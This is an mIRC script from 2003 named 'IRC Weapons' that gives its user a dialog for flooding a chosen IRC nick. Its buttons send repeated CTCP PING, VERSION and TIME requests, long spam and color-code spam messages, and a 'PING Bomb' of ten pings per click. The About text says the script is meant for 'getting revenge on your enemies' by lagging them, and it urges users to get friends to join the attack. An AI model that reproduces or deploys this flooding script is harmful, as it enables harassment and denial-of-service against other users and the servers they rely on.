;======================================================== ; Dialogs ;======================================================== dialog ircweapons { title IRC Weapons size -1 -1 275 222 option dbu text "IRC Weapons", 1, 118 10 40 10 text "Flooding and more at the tips of your fingers.", 2, 87 21 109 9 button "PING", 3, 93 59 89 15 button "MSG", 4, 84 121 37 12 button "MSG+", 5, 143 121 37 12 box "MSG", 6, 78 110 111 28 box "CTCP", 7, 4 32 268 60 button "VERSION", 8, 37 60 37 12 button "TIME", 9, 198 60 37 12 text "©2003 josh1billion", 10, 112 202 48 9 box "", 11, 82 5 120 28 button "PING Bomb", 12, 117 160 37 12 box "High-Power", 13, 55 144 174 45 button "OK", 19, 235 208 37 12, ok edit "", 20, 113 100 68 10 text "Target:", 21, 87 100 25 8 button "Help", 14, 9 11 37 12 button "About", 15, 222 11 37 12 } dialog ircweaponsabout { title About IRC Weapons size -1 -1 123 128 option dbu text "About IRC Weapons", 1, 33 6 54 8 text "written by josh1billion", 2, 33 17 55 9 text "Created for the purpose of getting revenge on your enemies by lagging them down with PING attacks and more. The more people striking one target, the more lag will likely occur, so you may want your friends to help you.", 3, 27 41 68 62 button "OK", 4, 44 110 37 12, ok } dialog ircweaponshelp { title IRC Weapons Help size -1 -1 126 148 option dbu text "HOW TO USE: Right click in various places such as a nicklist and point to Josh Software, then click IRC Weapons to open IRC Weapons. The other way is by typing /ircweapons. When it opens, you can type the nick of whoever you want to attack with your IRC Weapons in the Target box. Then you can click one of the commands. The CTCP buttons are all pretty basic, with PING being the most commonly used. MSG will send the target a long private message. MSG+ will send a message with colors, which probably lags more. PING Bomb pings the target 10 times per click. Beware though, many servers are set so if you attack your target too rapidly, you'll be disconnected from the server.", 3, 4 15 114 106 box "IRC Weapons Help - by josh1billion", 1, 1 5 120 120 button "OK", 2, 40 130 37 12, ok } ;======================================================== ; Initialization and Script Load ;======================================================== on *:dialog:ircweapons:init:0: { /did -a ircweapons 20 %ircweaponstarget } on *:LOAD: { /set %ircweaponstarget Nick | dialog -mr ircweaponsabout ircweaponsabout } alias ircweaponsupdate { /set %ircweaponstarget $did(ircweapons,20) } alias ircweapons { dialog -mr ircweapons ircweapons } ;======================================================== ; Button Actions ;======================================================== on *:dialog:ircweapons:sclick:3: { ircweaponsupdate | ctcp %ircweaponstarget PING } on *:dialog:ircweapons:sclick:8: { ircweaponsupdate | ctcp %ircweaponstarget VERSION } on *:dialog:ircweapons:sclick:9: { ircweaponsupdate | ctcp %ircweaponstarget TIME } on *:dialog:ircweapons:sclick:4: { ircweaponsupdate | msg %ircweaponstarget YoU'vE jUsT bEeN aTtAcKeD bY a FlYiNg PiG! 123456789? !@#$%^&*()-_=+ YoU'vE jUsT bEeN aTtAcKeD bY a FlYiNg PiG! 123456789? !@#$%^&*()-_=+ YoU'vE jUsT bEeN aTtAcKeD bY a FlYiNg PiG! 123456789? !@# YoU'vE jUsT bEeN aTtAcKeD bY a FlYiNg PiG! 123456789? !@#$%^&*()-_=+ YoU'vE jUsT bEeN aTtAcKeD bY a FlYiNg PiG! 123456789? !@#$%^&*()-_=+ YoU'vE jUsT bEeN aTtAcKeD bY a FlYiNg PiG! 123456789? !@#$%^&*()-_=+ YoU'vE jUsT bEeN aTtAcKeD bY a FlYiNg PiG! 123456789? !@#$%^&*()-_=+ YoU'vE jUsT bEeN aTtAcKeD bY a FlYiNg PiG! 123456789? !@#$%^&*()-_=+ } on *:dialog:ircweapons:sclick:5: { ircweaponsupdate | msg %ircweaponstarget 4,3Y1,2o10,11U12,13'15,14v12,5E6,7 j8,9U2,7s13,6T8,7 b13,6E14,11e1,3N0,12 a5,4T3,2t4,5A6,7c12,11K9,10e15,14D0,1 15,6b7,3Y11,1 a0,9 5,6F3,74,3l2,1Y9,8i7,6N5,4g13,12 P2,1i3,4G12,1!6,7 123456789? 0,1!12,13@14,15#16,1$0,3%4,5^6,7&8,9*10,11(12,13)14,15-4,9_6,3=9,4+ 4,3Y1,2o10,11U12,13'15,14v12,5E6,7 j8,9U2,7s13,6T8,7 b13,6E14,11e1,3N0,12 a5,4T3,2t4,5A6,7c12,11K9,10e15,14D0,1 15,6b7,3Y11,1 a0,9 5,6F3,74,3l2,1Y9,8i7,6N5,4g13,12 P2,1i3,4G12,1!6,7 123456789? 0,1!12,13@14,15#16,1$0,3%4,5^6,7&8,9*10,11(12,13)14,15-4,9_6,3=9,4+ 4,3Y1,2o10,11U12,13'15,14v12,5E6,7 j8,9U2,7s13,6T8,7 b13,6E14,11e1,3N0,12 a5,4T3,2t4,5A6,7c12,11K9,10e15,14D0,1 15,6b7,3Y11,1 a0,9 5,6F3,74,3l2,1Y9,8i7,6N5,4g13,12 P2,1i3,4G12,1!6,7 123456789? 0,1!12,13@ } on *:dialog:ircweapons:sclick:19: { ircweaponsupdate } on *:dialog:ircweapons:sclick:14: { dialog -mr ircweaponshelp ircweaponshelp } on *:dialog:ircweapons:sclick:15: { dialog -mr ircweaponsabout ircweaponsabout } on *:dialog:ircweapons:sclick:12: { ircweaponsupdate | ctcp %ircweaponstarget PING | ctcp %ircweaponstarget PING | ctcp %ircweaponstarget PING | ctcp %ircweaponstarget PING | ctcp %ircweaponstarget PING | ctcp %ircweaponstarget PING | ctcp %ircweaponstarget PING | ctcp %ircweaponstarget PING | ctcp %ircweaponstarget PING | ctcp %ircweaponstarget PING } ;======================================================== ; Menus ;======================================================== menu query,nicklist,menubar,channel { Josh Software .IRC Weapons v1.0: { dialog -mr ircweapons ircweapons } } alias ircweapons { /dialog -mr ircweapons ircweapons }